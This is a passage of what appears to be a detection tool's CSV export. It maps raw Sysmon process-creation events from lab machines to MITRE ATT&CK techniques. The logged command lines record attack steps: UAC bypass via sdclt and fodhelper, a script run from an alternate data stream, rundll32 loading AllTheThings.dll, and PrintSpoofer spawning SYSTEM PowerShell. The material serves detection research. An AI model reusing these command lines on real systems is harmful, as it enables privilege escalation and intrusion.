<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T03:25:25.067945Z"">
</TimeCreated>
<EventRecordID>11267</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1988"" ThreadID=""228"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 03:25:24.677</Data>
<Data Name=""ProcessGuid"">365ABB72-9DA4-5CD3-0000-00107F7A2F00</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /name Microsoft.BackupAndRestoreCenter</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
<Data Name=""LogonId"">0x13add</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9DA4-5CD3-0000-00102E692F00</Data>
<Data Name=""ParentProcessId"">3184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sdclt.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\sdclt.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /C &quot;C:\Windows\wscript.exe &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T02:52:23.531513Z"">
</TimeCreated>
<EventRecordID>11242</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1988"" ThreadID=""228"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 02:52:23.515</Data>
<Data Name=""ProcessGuid"">365ABB72-95E7-5CD3-0000-001004970F00</Data>
<Data Name=""ProcessId"">3784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /C &quot;C:\Windows\wscript.exe &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
<Data Name=""LogonId"">0x13add</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9570-5CD3-0000-00103FC90A00</Data>
<Data Name=""ParentProcessId"">1900</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.237600Z"">
</TimeCreated>
<EventRecordID>4965</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.213</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ProcessId"">6836</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T10:14:08.472102Z"">
</TimeCreated>
<EventRecordID>5277</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 10:14:08.401</Data>
<Data Name=""ProcessGuid"">747F3D96-5E70-5D45-0000-0010FCDD9D00</Data>
<Data Name=""ProcessId"">3656</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-5E6F-5D45-0000-001014CA9D00</Data>
<Data Name=""ParentProcessId"">8180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\fodhelper.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\fodhelper.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:48.925560Z"">
</TimeCreated>
<EventRecordID>8116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:48.909</Data>
<Data Name=""ProcessGuid"">365ABB72-3ED4-5D0B-0000-0010B2871A00</Data>
<Data Name=""ProcessId"">1440</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;cmd&quot;</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
<Data Name=""LogonId"">0x13529</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
<Data Name=""ParentProcessId"">816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T10:14:08.472102Z"">
</TimeCreated>
<EventRecordID>5277</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 10:14:08.401</Data>
<Data Name=""ProcessGuid"">747F3D96-5E70-5D45-0000-0010FCDD9D00</Data>
<Data Name=""ProcessId"">3656</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-5E6F-5D45-0000-001014CA9D00</Data>
<Data Name=""ParentProcessId"">8180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\fodhelper.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\fodhelper.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch &gt; \\.\pipe\msdhch ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T07:46:15.215239Z"">
</TimeCreated>
<EventRecordID>8575</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1876"" ThreadID=""1444"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 07:46:15.183</Data>
<Data Name=""ProcessGuid"">365ABB72-FD47-5CC7-0000-00106AF61D00</Data>
<Data Name=""ProcessId"">4088</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c echo msdhch &gt; \\.\pipe\msdhch</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-F6A1-5CC7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-F6A1-5CC7-0000-001004550000</Data>
<Data Name=""ParentProcessId"">468</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:54.867394Z"">
</TimeCreated>
<EventRecordID>110434</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:54.866</Data>
<Data Name=""ProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ProcessId"">1428</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010ECCBC200</Data>
<Data Name=""ParentProcessId"">6760</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe</Data>
<Data Name=""ParentCommandLine"">PrintSpoofer.exe -i -c powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:54.867394Z"">
</TimeCreated>
<EventRecordID>110434</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:54.866</Data>
<Data Name=""ProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ProcessId"">1428</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010ECCBC200</Data>
<Data Name=""ParentProcessId"">6760</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe</Data>
<Data Name=""ParentCommandLine"">PrintSpoofer.exe -i -c powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:45.243751Z"">
</TimeCreated>
<EventRecordID>348</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:45.193</Data>
<Data Name=""ProcessGuid"">747F3D96-292D-5E1E-0000-0010F5597D00</Data>
<Data Name=""ProcessId"">3828</Data>
<Data Name=""Image"">C:\Windows\explorer.exe</Data>
<Data Name=""FileVersion"">10.0.17763.348 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Explorer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">EXPLORER.EXE</Data>
<Data Name=""CommandLine"">explorer ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-292D-5E1E-0000-0020CD587D00</Data>
<Data Name=""LogonId"">0x7d58cd</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:45.243751Z"">
</TimeCreated>
<EventRecordID>348</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:45.193</Data>
<Data Name=""ProcessGuid"">747F3D96-292D-5E1E-0000-0010F5597D00</Data>
<Data Name=""ProcessId"">3828</Data>
<Data Name=""Image"">C:\Windows\explorer.exe</Data>
<Data Name=""FileVersion"">10.0.17763.348 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Explorer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">EXPLORER.EXE</Data>
<Data Name=""CommandLine"">explorer ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-292D-5E1E-0000-0020CD587D00</Data>
<Data Name=""LogonId"">0x7d58cd</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
